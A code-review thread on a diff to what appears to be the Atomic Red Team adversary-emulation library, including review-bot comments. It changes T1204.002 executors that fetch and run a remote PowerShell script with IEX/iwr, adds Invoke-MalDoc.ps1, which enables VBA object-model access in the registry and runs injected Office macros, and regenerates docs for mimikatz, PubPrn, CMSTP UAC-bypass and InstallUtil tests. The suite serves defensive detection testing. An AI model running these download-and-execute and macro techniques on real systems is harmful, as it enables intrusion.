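Review bot: The executor command still fetches Invoke-MalDoc.ps1 from the `master` branch and pipes it straight into `IEX` on every run, even though this commit vendors that same script into the repo at `atomics/T1204.002/src/Invoke-MalDoc.ps1`; what executes is therefore whatever master holds on the day the test runs, not the reviewed copy, and the test cannot run offline. Dot-sourcing the local file with the placeholder the other tests already use, `. "PathToAtomicsFolder\T1204.002\src\Invoke-MalDoc.ps1"`, keeps the test reproducible and removes the run-time dependency on an unpinned remote script; the download could stay as a fallback when the file is absent. The new `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` line assigns rather than ORs, so it silently disables every other protocol (e.g. TLS 1.3) for the rest of the PowerShell session; `-bor` it onto the existing value instead. The same pattern is repeated in the four hunks that follow in this file (`@@ -91`, `@@ -126`, `@@ -160`, `@@ -285`).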
@@ -91,7 +92,8 @@ atomic_tests:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
@@ -126,7 +128,8 @@ atomic_tests:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
@@ -160,7 +163,8 @@ atomic_tests:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
name: powershell
@@ -285,7 +289,8 @@ atomic_tests:
Write-Host "You will need to install Google Chrome manually to meet this requirement"
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
name: powershell
diff --git a/atomics/T1204.002/src/Invoke-MalDoc.ps1 b/atomics/T1204.002/src/Invoke-MalDoc.ps1
new file mode 100644
index 00000000..b567ad56
--- /dev/null
+++ b/atomics/T1204.002/src/Invoke-MalDoc.ps1
@@ -0,0 +1,100 @@
+function Invoke-MalDoc {
+ <#
+ .SYNOPSIS
+ A module to programatically execute Microsoft Word and Exel Documents containing macros.
+
+ .DESCRIPTION
+ A module to programatically execute Microsoft Word and Exel Documents containing macros. The module will temporarily add a registry key to allow PowerShell to interact with VBA.
+ .PARAMETER macroCode
+ [Required] The VBA code to be executed. By default, this macro code will be wrapped in a sub routine, called "Test" by default. If you don't want your macro code to be wrapped in a subroutine use the `-noWrap` flag. To specify the subroutine name use the `-sub` parameter.
+ .PARAMETER macroFile
+ [Required] A file containing the VBA code to be executed. To specify the subroutine name to be called use the `-sub` parameter.
+ .PARAMETER officeVersion
+ [Optional] The Microsoft Office version to use for executing the document. e.g. "16.0". The version will be determined Programmatically if not specified.
+ .PARAMETER officeProduct
+ [Required] The Microsoft Office application in which to create and execute the macro, either "Word" or "Excel".
+ .PARAMETER sub
+ [Optional] The name of the subroutine in the macro code to call for execution. Also the name of the subroutine to wrap the supplied `macroCode` in if `noWrap` is not specified.
+ .PARAMETER noWrap
+ [Optional] A switch that specifies that the supplied `macroCode` should be used as-is and not wrapped in a subroutine.
+
+ .EXAMPLE
+ C:\PS> Invoke-Maldoc -macroCode "MsgBox `"Hello`"" -officeProduct "Word"
+ -----------
+ Create a macro enabled Microsoft Word Document. The macro code `MsgBox "Hello"` will be wrapped inside of a subroutine call "Test" and then executed.
+
+ .EXAMPLE
+ C:\PS> $macroCode = Get-Content path/to/macro.txt -Raw
+ C:\PS> Invoke-Maldoc -macroCode $macroCode -officeProduct "Word"
+ -----------
+ Create a macro enabled Microsoft Word Document. The macro code read from `path/to/macro.txt` will be wrapped inside of a subroutine call "Test" and then executed.
+
+ .EXAMPLE
+ C:\PS> Invoke-Maldoc -macroCode "MsgBox `"Hello`"" -officeProduct "Excel" -sub "DoIt"
+ -----------
+ Create a macro enabled Microsoft Excel Document. The macro code `MsgBox "Hello"` will be wrapped inside of a subroutine call "DoIt" and then executed.
+
+ .EXAMPLE
+ C:\PS> Invoke-Maldoc -macroCode "Sub Exec()`nMsgBox `"Hello`"`nEnd Sub" -officeProduct "Word" -noWrap -sub "Exec"
+ -----------
+ Create a macro enabled Microsoft Word Document. The macroCode will be unmodified (i.e. not wrapped insided a subroutine) and the "Exec" subroutine will be executed.
+
+ .EXAMPLE
+ C:\PS> Invoke-Maldoc -macroFile "C:\AtomicRedTeam\atomics\T1003\src\macro.txt" -officeProduct "Word" -sub "DoIt"
+ -----------
+ Create a macro enabled Microsoft Word Document. The macroCode will be read from the specified file and the "DoIt" subroutine will be executed.
+
+#>
+
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ParameterSetName = "code")]
+ [String]$macroCode,
+
+ [Parameter(Position = 0, Mandatory = $True, ParameterSetName = "file")]
+ [String]$macroFile,
+
+ [Parameter(Position = 1, Mandatory = $False)]
+ [String]$officeVersion,
+
+ [Parameter(Position = 2, Mandatory = $True)]
+ [ValidateSet("Word", "Excel")]
+ [String]$officeProduct,
+
+ [Parameter(Position = 3, Mandatory = $false)]
+ [String]$sub = "Test",
+
+ [Parameter(Position = 4, Mandatory = $false, ParameterSetName = "code")]
+ [switch]$noWrap
+ )
+
+ $app = New-Object -ComObject "$officeProduct.Application"
+ if (-not $officeVersion) { $officeVersion = $app.Version }
+ $Key = "HKCU:\Software\Microsoft\Office\$officeVersion\$officeProduct\Security\"
+ if (-not (Test-Path $key)) { New-Item $Key }
+ Set-ItemProperty -Path $Key -Name 'AccessVBOM' -Value 1
+
+ if ($macroFile) {
+ $macroCode = Get-Content $macroFile -Raw
+ }
+ elseif (-not $noWrap) {
+ $macroCode = "Sub $sub()`n" + $macroCode + "`nEnd Sub"
+ }
+
+ if ($officeProduct -eq "Word") {
+ $doc = $app.Documents.Add()
+ }
+ else {
+ $doc = $app.Workbooks.Add()
+ }
+ $comp = $doc.VBProject.VBComponents.Add(1)
+ $comp.CodeModule.AddFromString($macroCode)
+ $app.Run($sub)
+ $doc.Close(0)
+ $app.Quit()
+ [System.Runtime.InteropServices.Marshal]::ReleaseComObject($comp) | Out-Null
+ [System.Runtime.InteropServices.Marshal]::ReleaseComObject($doc) | Out-Null
+ [System.Runtime.InteropServices.Marshal]::ReleaseComObject($app) | Out-Null
+ [System.GC]::Collect()
+ [System.GC]::WaitForPendingFinalizers()
+ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$officeVersion\$officeProduct\Security\" -Name 'AccessVBOM' -ErrorAction Ignore
+}
\ No newline at end of file
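Review bot: Nothing between the `Set-ItemProperty` that sets AccessVBOM to 1 and the `Remove-ItemProperty` at the end of Invoke-MalDoc is protected by try/finally, so an error in `AddFromString` or `$app.Run($sub)` leaves the weakened trust setting in HKCU and an orphaned Office process behind. The cleanup also deletes the value unconditionally instead of restoring it, so a host that already had AccessVBOM configured ends the test in a different state than it started. Capture the prior value before setting it, move close/quit/registry cleanup into a `finally`, and restore the saved value, removing it only when none existed; `New-Item $Key` should also be piped to Out-Null so the created key object is not emitted as function output. The rewritten section is sketched below.
```powershell
    # … unchanged: comment-based help and Param(...) block …
    $app = New-Object -ComObject "$officeProduct.Application"
    if (-not $officeVersion) { $officeVersion = $app.Version }
    $Key = "HKCU:\Software\Microsoft\Office\$officeVersion\$officeProduct\Security\"
    if (-not (Test-Path $Key)) { New-Item $Key | Out-Null }
    # Remember what was there so cleanup restores it rather than deleting it
    $priorAccessVBOM = (Get-ItemProperty -Path $Key -Name 'AccessVBOM' -ErrorAction Ignore).AccessVBOM
    Set-ItemProperty -Path $Key -Name 'AccessVBOM' -Value 1
    try {
        # … unchanged: macro file/wrap handling, Documents/Workbooks.Add, VBComponents.Add, AddFromString, $app.Run($sub) …
    }
    finally {
        if ($doc) { $doc.Close(0) }
        $app.Quit()
        # … unchanged: ReleaseComObject and GC calls …
        if ($null -eq $priorAccessVBOM) {
            Remove-ItemProperty -Path $Key -Name 'AccessVBOM' -ErrorAction Ignore
        }
        else {
            Set-ItemProperty -Path $Key -Name 'AccessVBOM' -Value $priorAccessVBOM
        }
    }
```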
diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md
index f34d481e..a93d1f53 100644
--- a/atomics/T1207/T1207.md
+++ b/atomics/T1207/T1207.md
@@ -28,10 +28,14 @@ The easiest is to run elevated and as a Domain Admin user.
**Supported Platforms:** Windows
+**auto_generated_guid:** 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| object | Targeted object (for machine account do not forget to add final '$') | string | bruce.wayne|
| attribute | Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, SIDHistory... | string | badpwdcount|
@@ -79,7 +83,7 @@ Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore
##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
-if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -92,7 +96,7 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
+if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1216.001/T1216.001.md b/atomics/T1216.001/T1216.001.md
index 629309d6..90da7ee0 100644
--- a/atomics/T1216.001/T1216.001.md
+++ b/atomics/T1216.001/T1216.001.md
@@ -17,10 +17,14 @@ Executes the signed PubPrn.vbs script with options to download and execute an ar
**Supported Platforms:** Windows
+**auto_generated_guid:** 9dd29a1f-1e16-4862-be83-913b10a88f6c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct|
diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md
index d14d2c8b..75554d61 100644
--- a/atomics/T1216/T1216.md
+++ b/atomics/T1216/T1216.md
@@ -18,10 +18,14 @@ Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
+**auto_generated_guid:** 275d963d-3f36-476c-8bef-a2a3960ee6eb
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | A PowerShell command to execute. | string | Start-Process calc|
@@ -47,10 +51,14 @@ Executes the signed manage-bde.wsf script with options to execute an arbitrary c
**Supported Platforms:** Windows
+**auto_generated_guid:** 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | A command to execute. | Path | %windir%\System32\calc.exe|
diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md
index 0635173c..19cac217 100644
--- a/atomics/T1217/T1217.md
+++ b/atomics/T1217/T1217.md
@@ -31,10 +31,14 @@ Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that
**Supported Platforms:** Linux
+**auto_generated_guid:** 3a41f169-a5ab-407f-9269-abafdb5da6c2
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed. | Path | /tmp/T1217-Firefox.txt|
@@ -65,10 +69,14 @@ Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookm
**Supported Platforms:** macOS
+**auto_generated_guid:** 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed. | Path | /tmp/T1217_Firefox.txt|
@@ -99,10 +107,14 @@ Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in
**Supported Platforms:** macOS
+**auto_generated_guid:** b789d341-154b-4a42-a071-9111588be9bc
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed. | Path | /tmp/T1217-Chrome.txt|
@@ -134,6 +146,10 @@ Upon execution, paths that contain bookmark files will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** faab755e-4299-48ec-8202-fc7885eb6545
+
+
+
@@ -159,6 +175,10 @@ Upon execution, paths that contain bookmark files will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** 76f71e2f-480e-4bed-b61e-398fe17499d5
+
+
+
@@ -184,6 +204,10 @@ Upon execution, paths that contain bookmark files will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** 4312cdbc-79fc-4a9c-becc-53d49c734bc5
+
+
+
@@ -208,6 +232,10 @@ This test will list the bookmarks for Internet Explorer that are found in the Fa
**Supported Platforms:** Windows
+**auto_generated_guid:** 727dbcdb-e495-4ab1-a6c4-80c7f77aef85
+
+
+
diff --git a/atomics/T1218.001/T1218.001.md b/atomics/T1218.001/T1218.001.md
index ef702c12..270b1aa0 100644
--- a/atomics/T1218.001/T1218.001.md
+++ b/atomics/T1218.001/T1218.001.md
@@ -30,10 +30,14 @@ Upon execution calc.exe will open
**Supported Platforms:** Windows
+**auto_generated_guid:** 5cb87818-0d7c-4469-b7ef-9224107aebe8
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_chm_file | Local .chm payload | path | PathToAtomicsFolder\T1218.001\src\T1218.001.chm|
@@ -52,7 +56,7 @@ hh.exe #{local_chm_file}
##### Description: The payload must exist on disk at specified location (#{local_chm_file})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}
+if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -73,10 +77,14 @@ Upon execution displays an error saying the file cannot be open
**Supported Platforms:** Windows
+**auto_generated_guid:** 0f8af516-9818-4172-922b-42986ef1e81d
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_chm_file | Remote .chm payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm|
@@ -102,10 +110,14 @@ Executes a CHM file with the default Shortcut Command method.
**Supported Platforms:** Windows
+**auto_generated_guid:** 29d6f0d7-be63-4482-8827-ea77126c1ef7
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| chm_file_path | Default path of CHM | string | Test.chm|
| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe|
@@ -127,7 +139,7 @@ Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -146,10 +158,14 @@ Executes a CHM file with the ITS protocol handler.
**Supported Platforms:** Windows
+**auto_generated_guid:** b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe|
| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its|
@@ -172,7 +188,7 @@ Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFi
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -191,10 +207,14 @@ Executes a CHM file simulating a user double click.
**Supported Platforms:** Windows
+**auto_generated_guid:** 5decef42-92b8-4a93-9eb2-877ddcb9401a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| chm_file_path | Default path of CHM | string | Test.chm|
@@ -215,7 +235,7 @@ Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -234,10 +254,14 @@ Executes a CHM file with a defined script engine, ITS Protocol Handler, and help
**Supported Platforms:** Windows
+**auto_generated_guid:** 4f83adda-f5ec-406d-b318-9773c9ca92e5
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| topic_extension | Default Help Topic | string | html|
| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe|
@@ -262,7 +286,7 @@ Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -281,10 +305,14 @@ Executes a CHM file using the Shortcut Command method with a defined ITS Protoco
**Supported Platforms:** Windows
+**auto_generated_guid:** 15756147-7470-4a83-87fb-bb5662526247
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| topic_extension | Default Help Topic | string | html|
| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe|
@@ -308,7 +336,7 @@ Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotec
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1218.002/T1218.002.md b/atomics/T1218.002/T1218.002.md
index 8284a94a..95b2ed09 100644
--- a/atomics/T1218.002/T1218.002.md
+++ b/atomics/T1218.002/T1218.002.md
@@ -22,10 +22,14 @@ Upon execution calc.exe will be launched
**Supported Platforms:** Windows
+**auto_generated_guid:** 037e9d8a-9e46-4255-8b33-2ae3b545ca6f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| cpl_file_path | path to cpl file | path | PathToAtomicsFolder\T1218.002\bin\calc.cpl|
@@ -44,7 +48,7 @@ control.exe #{cpl_file_path}
##### Description: Cpl file must exist on disk at specified location (#{cpl_file_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1}
+if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1218.003/T1218.003.md b/atomics/T1218.003/T1218.003.md
index 6fcb3da3..57adcbec 100644
--- a/atomics/T1218.003/T1218.003.md
+++ b/atomics/T1218.003/T1218.003.md
@@ -21,10 +21,14 @@ Adversaries may supply CMSTP.exe with INF files infected with malicious commands
**Supported Platforms:** Windows
+**auto_generated_guid:** 34e63321-9683-496b-bbc1-7566bc55e624
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_file_path | Path to the INF file | path | PathToAtomicsFolder\T1218.003\src\T1218.003.inf|
@@ -43,7 +47,7 @@ cmstp.exe /s #{inf_file_path}
##### Description: INF file must exist on disk at specified location (#{inf_file_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{inf_file_path}) {exit 0} else {exit 1}
+if (Test-Path #{inf_file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -63,10 +67,14 @@ Adversaries may invoke cmd.exe (or other malicious commands) by embedding them i
**Supported Platforms:** Windows
+**auto_generated_guid:** 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_file_uac | Path to the INF file | path | PathToAtomicsFolder\T1218.003\src\T1218.003_uacbypass.inf|
@@ -85,7 +93,7 @@ cmstp.exe /s #{inf_file_uac} /au
##### Description: INF file must exist on disk at specified location (#{inf_file_uac})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1}
+if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1218.004/T1218.004.md b/atomics/T1218.004/T1218.004.md
index c7a174a8..52a9a6bb 100644
--- a/atomics/T1218.004/T1218.004.md
+++ b/atomics/T1218.004/T1218.004.md
@@ -32,10 +32,14 @@ If no output is displayed the test executed successfuly.
**Supported Platforms:** Windows
+**auto_generated_guid:** ffd9c807-d402-47d2-879d-f915cf2a3a94
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1|
| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\|
@@ -87,7 +91,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -108,10 +112,14 @@ executed successfuly.
**Supported Platforms:** Windows
+**auto_generated_guid:** d43a5bde-ae28-4c55-a850-3f4c80573503
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1|
| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\|
@@ -165,7 +173,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -185,10 +193,14 @@ Executes the installer assembly class constructor. Upon execution, version infor
**Supported Platforms:** Windows
+**auto_generated_guid:** 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1|
| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\|
@@ -242,7 +254,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -262,10 +274,14 @@ Executes the Install Method. Upon execution, version information will be display
**Supported Platforms:** Windows
+**auto_generated_guid:** 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1|
| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\|
@@ -319,7 +335,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -339,10 +355,14 @@ Executes the Uninstall Method. Upon execution, version information will be displ
**Supported Platforms:** Windows
+**auto_generated_guid:** 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1|
| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\|
@@ -396,7 +416,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -416,10 +436,14 @@ Executes the Uninstall Method. Upon execution, version information will be displ
**Supported Platforms:** Windows
+**auto_generated_guid:** 06d9deba-f732-48a8-af8e-bdd6e4d98c1d
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1|
| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\|
@@ -473,7 +497,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -493,10 +517,14 @@ Executes the Uninstall Method. Upon execution, help information will be displaye
**Supported Platforms:** Windows
+**auto_generated_guid:** 5a683850-1145-4326-a0e5-e91ced3c6022
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
